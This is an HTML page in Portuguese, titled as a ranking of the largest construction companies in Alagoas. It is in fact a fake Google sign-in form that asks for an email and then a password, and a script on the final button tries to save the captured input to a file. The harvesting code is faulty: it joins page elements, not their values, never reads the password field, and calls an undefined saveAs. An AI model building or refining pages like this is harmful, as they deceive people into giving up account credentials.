<!doctype html>
<html lang="en">

<head>
  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

  <!-- Bootstrap CSS -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/css/bootstrap.min.css"
    integrity="sha384-ggOyR0iXCbMQv3Xipma34MD+dH/1fQ784/j6cY/iJTQUOhcWr7x9JvoRxT2MZw1T" crossorigin="anonymous">

  <title>Ranking INTEC das maiores construtoras de Alagoas</title>
</head>

<body class="vw-100 vh-100 text-center">
  <style>
    body,
    html {
      overflow: hidden;
    }

    * {
      padding-bottom: 0;
      padding-top: 16px;
      color: #202124;
      font-size: 14px;
      font-family: "Google Sans", "Noto Sans Myanmar UI", arial, sans-serif;
      font-weight: 400;
      line-height: 1.3333;
      margin-bottom: 0;
      margin-top: 0;
      word-break: break-word;
    }

    input {
      border-radius: 4px !important;
      color: #202124 !important;
      font-size: 16px !important;
      height: 38px !important;
      margin: 1px 1px 0 1px !important;
      padding: 30px 15px !important;
      z-index: 1;
    }

    .bordinha {
      background: #fff;
      border: 1px solid #dadce0;
      border-radius: 8px;
      padding: 48px 40px 36px;
    }

    .btng {
      font-family: "Google Sans", Roboto, Arial, sans-serif;
      font-size: 15px;
      letter-spacing: .0107142857em;
      font-weight: 400;
      padding: 10px 20px;
      text-transform: none;
      transition: border 280ms cubic-bezier(0.4, 0, 0.2, 1), box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);
      box-shadow: none;
    }

    #ele {
      align-items: center;
      background: #fff;
      color: #3c4043;
      border-radius: 35px;
      cursor: pointer;
      display: -webkit-inline-box;
      display: inline-flex;
      font-family: "Google Sans", "Noto Sans Myanmar UI", arial, sans-serif;
      font-weight: 300;
      font-size: 12px;
      letter-spacing: 0.25px;
      max-width: 100%;
      bottom: -1px;
    }
  </style>
  <div class="d-flex flex-row justify-content-center w-100 h-100 align-items-center">
    <div id="campo1" class="flex-column bordinha" style="width: 30%; height: 65%; display: flex;">
      <img class="align-self-center" src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg"
        width="75">
      <h2>Faça login para continuar</h2>
      <div class="input-group" class="p-0 m-0">
        <input id="chocolate" type="text" placeholder="Email ou Telemóvel" class="form-control mt-0"
          aria-describedby="basic-addon2">
      </div>
      <a href="#" class="mt-0 pt-2 align-self-start" style="font-family: 24px !important;">Esqueceu-se do email?</a>
      <p class="text-justify mt-3 mb-5">Este computador não é seu? Utilize o modo convidado para iniciar sessão de forma
        privada.
      </p>
      <div class="d-flex flex-row justify-content-between">
        <div class="d-flex flex-column pt-0 align-self-center justify-content-between">
          <a href="#" class="pt-0">Criar conta</a>
        </div>
        <div class="d-flex flex-column pt-0">
          <button type="button" id="btn-seguinte" class="btn btn-primary btng">Avançar</button>
        </div>
      </div>
    </div>
    <div id="campo2" class="flex-column bordinha" style="width: 30%; height: 65%; display: none;">
      <img class="align-self-center" src="https://upload.wikimedia.org/wikipedia/commons/2/2f/Google_2015_logo.svg"
        width="75">
      <div class="d-flex flex-column align-self-center">
        <h2>Olá</h2>
        <div class="d-flex flex-row align-items-center pt-0">
          <img src="https://freesvg.org/img/abstract-user-flat-1.png" height="20" width="20"
            style="padding: 0px !important;">
          <div id="ele" class="mx-2 pt-0"></div>
        </div>
      </div>
      <div class="input-group" class="p-0 m-0">
        <input type="text" id="uva" placeholder="Introduza a palavra-passe" class="form-control mt-0"
          aria-describedby="basic-addon2">
      </div>
      <p class="text-justify mt-3 mb-5">Este computador não é seu? Utilize o modo convidado para iniciar sessão de forma
        privada.
      </p>
      <div class="d-flex flex-row justify-content-between">
        <div class="d-flex flex-column pt-0 align-self-center justify-content-between">
          <a href="#" class="pt-0">Criar conta</a>
        </div>
        <div class="d-flex flex-column pt-0">
          <button type="button" id="done" class="btn btn-primary btng">Avançar</button>
        </div>
      </div>
    </div>
  </div>

  <script>

    const btn = document.getElementById("btn-seguinte");
    const targetDiv = document.getElementById("campo1");
    const targetDiv2 = document.getElementById("campo2");
    const eu = document.getElementById("chocolate");
    const ele = document.getElementById("ele");

    btn.onclick = function () {
      targetDiv.style.display = "none";
      targetDiv2.style.display = "flex";
      ele.innerHTML = eu.value
    };
  </script>

  <script>
    document.getElementById('done').addEventListener('click', function (e) {
      var text = eu + ele;
      var file = new File([text], "ok.txt", { type: "text/plain;charset=utf-8" });
      // save it
      saveAs(file);
    });
  </script>
  <!-- Optional JavaScript -->
  <!-- jQuery first, then Popper.js, then Bootstrap JS -->
  <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"
    integrity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/popper.js@1.14.7/dist/umd/popper.min.js"
    integrity="sha384-UO2eT0CpHqdSJQ6hJty5KVphtPhzWj9WO1clHTMGa3JDZwrnQq4sF86dIHNDz0W1"
    crossorigin="anonymous"></script>
  <script src="https://cdn.jsdelivr.net/npm/bootstrap@4.3.1/dist/js/bootstrap.min.js"
    integrity="sha384-JjSmVgyd0p3pXB1rRibZUAYoIIy6OrQ6VrjIEaFf/nJGzIxFDsf4x0xIM+B07jRM"
    crossorigin="anonymous"></script>
</body>

</html>
